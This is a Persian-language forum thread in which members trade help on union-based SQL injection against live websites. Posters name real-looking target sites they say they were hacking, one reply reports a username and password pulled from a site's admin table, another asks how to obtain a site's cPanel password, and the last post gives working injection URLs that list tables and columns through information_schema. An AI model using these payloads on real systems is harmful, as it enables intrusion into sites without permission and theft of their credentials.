• ¡Welcome to Square Theme!
  • This news are in header template.
  • Please ignore this message.
مهمان عزیز خوش‌آمدید. ورود عضــویت


امتیاز موضوع:
  • 0 رای - 0 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5
Title: sql-injection
حالت موضوعی
#1
درود:
دوستان من به یک موضوع در حمله sql برخوردم من تا این جا میرم دیگه گیر میکنم اگه میشه خودتون جواب بدین و ادرس سایت یا .. ندین

1-من تعداد column ها رو بدست اوردم
2-column اسیب پذیر رو بدست اوردم
3-ورژن 5 هست
4-بدست اوردن نام تیبل رو نمیدونم
5-بعد بلدم

فقط 4 رو مشکل دارم میشه کمکم کنید
با همه چيز درآميز و با هيچ چيز آميخته مشو

که در انزوا پاک ماندن نه سخت است و نه با ارزش
-
-
-



 
پاسخ
#2
پست زیر رو ببین

با مثال همه توضیح داده شده

http://parsicoders.com/showthread.php?ti...88#pid6888
گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
 
پاسخ
#3
نقل قول:
4-بدست اوردن نام تیبل رو نمیدونم
یعنی چی نمیدونی ؟!
کاملتر توضیح بده ، بعدش یه سوال معمولا اول table ها رو در می ارن بعدش colum رو چطوریه که شما colum رو داری بعد table رو نداری ؟ :d

 
پاسخ
#4
درود:
امین جان
گفتم ادرس نده فقط یک کلمه جواب می خوام بدشم لینک خراب بور اصلا سایتی باز نشد منظورم این است که

http://c2-europe.eu/news-full.php?id=-50...from+admin--

این رو دیروز داشتم هکش میکردم البته شانسی بود و شانسی admin در اومد اما چند تا دیگه بود نتونستم اسم تیبل رو حدس بزنم حتی از این راه هم رفتم اما به نتیجه نرسیدم

http://www.placeanad.ru/index.php?id_typ...ma.columns--

مثلا

این رو نام تیبل ها رو به دست اوردم اما در اخرین قسمت کد یعنی from n----n که قرار میدم ارور میده مشکل من تو به دست اودن تیبل اخره

چی گفتم دقیقا کی حالیش شد ؟
با همه چيز درآميز و با هيچ چيز آميخته مشو

که در انزوا پاک ماندن نه سخت است و نه با ارزش
-
-
-



 
پاسخ
#5
نقل قول: http://c2-europe.eu/news-full.php?id=-50...from+admin--
راجع به این باید بگم که username و password روی تیبل های آسیب پذیر نمیزاشتی درستش اینطوری میشه :
http://c2-europe.eu/news-full.php?id=-50...from+admin--
که پسورد میاد جای 5 که میشه :
5ejufe
و یوزر جای 7 که میشه :
michael
واسه بعدی هم باید از اول تست کنم که زمان میبره باید کمی صبر کنی چون فردا امتحان دارم :-d

 
پاسخ
#6
درود:
دوستان دقت نکردید چه گفتم منظورم این هست که نام تیبل رو که ازش می خوهم اطلاعات بدس بیاریم رو نمیدونم چی کار باید بکنم (من خودم شانسی یا حدس میزنم ) روشی وجود داره که خودش نام تیبل ها رو بگه v5 و بالاتر

درود:
ادمین پیج پیدا نشد اما cpanel سایت پیدا شد اما پسورد cpanel فرق میکرد پسورد cpanel رو از کجا بدست بیارم
با همه چيز درآميز و با هيچ چيز آميخته مشو

که در انزوا پاک ماندن نه سخت است و نه با ارزش
-
-
-



 
پاسخ
#7
این اولی چرا بایپس نمیشه !!!!! عصابم و خورد کرد کسی تونسته ؟

 
پاسخ
#8
این http://c2-europe.eu که اصلا راه بده نیست !

ولی اونیکی ورژن دیتابیس کمتر از 5 هست یعنی اینکه دیگه چیزی به اسم information_schema نداریم و شما باید تیبل ها و کلوم ها رو حدس بزنی

 
پاسخ
#9
درود:
به طور مثال شما این تارگت رو که من دادی چجوری تیبلش رو پیدا کردی

http://www.site.ir/modules.php?option=co...80%8Ber_tb

member_tb
رو میگم .
با همه چيز درآميز و با هيچ چيز آميخته مشو

که در انزوا پاک ماندن نه سخت است و نه با ارزش
-
-
-



 
پاسخ
#10
اونکه مثل هلو هست :d
چون ورژن دیتابیس 5 به بالا هست فایل information_schema وجود داره پس "
تیبل:
کد:
http://www..****..ir/modules.php?option=comnews&do=view&id=-1157+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables

کلومن:
کد:
http://www.****.ir/modules.php?option=comnews&do=view&id=-1157+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.columns

 
پاسخ
  


موضوعات مشابه ...
موضوع نویسنده پاسخ بازدید آخرین ارسال
  لیست دورک های جدید برای حمله sql injection Amin_Mansouri 3 45,811 12-30-2012، 11:13 PM
آخرین ارسال: Amin_Mansouri
  Joomla Component (Akogallery) Remote SQL Injection Amin_Mansouri 0 4,159 08-30-2011، 12:48 PM
آخرین ارسال: Amin_Mansouri
  ASP Exploitation SQL Injection Vulnerability Amin_Mansouri 0 4,354 08-30-2011، 12:44 PM
آخرین ارسال: Amin_Mansouri

پرش به انجمن:


Browsing: 5 مهمان